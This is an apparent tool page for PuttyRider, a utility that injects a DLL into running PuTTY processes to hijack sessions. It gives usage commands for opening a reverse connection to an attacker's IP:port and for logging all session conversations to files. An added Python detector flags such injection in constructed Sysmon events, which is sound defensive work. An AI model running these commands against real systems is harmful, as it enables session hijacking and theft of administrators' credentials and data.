PuttyRider targets the sysadmin tool PuTTY. This tiny utility hijacks PuTTY sessions and injects code into open sessions.
List existing PuTTY processes and their status (injected / not injected)
Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Run in the background and wait for new PuTTY processes. Inject into any new putty.exe and write all conversations to local files.
PuttyRider.exe -w -f
Eject PuttyRider.dll from all PuTTY processes where it is already injected. (Don’t forget to kill PuttyRider.exe if it is running in -w mode, otherwise it will inject again.)
PuttyRider.exe -x
Download, code, details here
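A defender's view of the behaviour described above, as an added example that is not part of the original page or of the PuttyRider project: it scans Sysmon-style image-load (Event ID 7) and network-connection (Event ID 3) records for a module loaded into putty.exe from an unexpected path, then for a connection from that same process to an unexpected port. The events are constructed, the records are assumed to be in chronological order, and the trusted directories and expected port set are assumptions to adapt per site.

```python
import ntpath

# Constructed Sysmon-style records (not real telemetry). Field names follow
# Sysmon Event ID 7 (image loaded) and Event ID 3 (network connection).
PUTTY = r"C:\Program Files\PuTTY\putty.exe"
SAMPLE_EVENTS = [
    {"EventID": 7, "ProcessId": 4120, "Image": PUTTY,
     "ImageLoaded": r"C:\Windows\System32\ws2_32.dll"},
    {"EventID": 7, "ProcessId": 4120, "Image": PUTTY,
     "ImageLoaded": r"C:\Users\admin\AppData\Local\Temp\PuttyRider.dll"},
    {"EventID": 3, "ProcessId": 4120, "Image": PUTTY,
     "DestinationIp": "10.0.0.12", "DestinationPort": 22},
    {"EventID": 3, "ProcessId": 4120, "Image": PUTTY,
     "DestinationIp": "192.168.0.55", "DestinationPort": 8080},
    {"EventID": 7, "ProcessId": 5000, "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Temp\other.dll"},
]
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")  # assumption
EXPECTED_PORTS = {22}  # assumption: this site only uses PuTTY for SSH on port 22

def _trusted(path):
    """True if the module sits in (or below) one of the trusted directories."""
    d = ntpath.normcase(ntpath.dirname(path))
    return any(d == t or d.startswith(t + "\\") for t in TRUSTED_DIRS)

def detect(events):
    """Return (pid, severity, reason) findings for putty.exe processes."""
    findings, tainted = [], set()
    for ev in events:
        if ntpath.basename(ev.get("Image", "")).lower() != "putty.exe":
            continue
        pid = ev["ProcessId"]
        if ev["EventID"] == 7:
            dll = ev["ImageLoaded"]
            if ntpath.basename(dll).lower() == "puttyrider.dll":
                tainted.add(pid)
                findings.append((pid, "high", "PuttyRider.dll loaded: " + dll))
            elif not _trusted(dll):  # also catches a renamed DLL
                tainted.add(pid)
                findings.append((pid, "medium", "module from untrusted path: " + dll))
        elif ev["EventID"] == 3 and ev["DestinationPort"] not in EXPECTED_PORTS:
            dest = "%s:%d" % (ev["DestinationIp"], ev["DestinationPort"])
            # A prior suspicious module load in the same process raises severity.
            sev = "high" if pid in tainted else "low"
            findings.append((pid, sev, "connection to unexpected port: " + dest))
    return findings
```

On the constructed sample, `detect(SAMPLE_EVENTS)` reports the DLL load and the later connection to port 8080 for PID 4120, and ignores the port 22 session and the unrelated explorer.exe event.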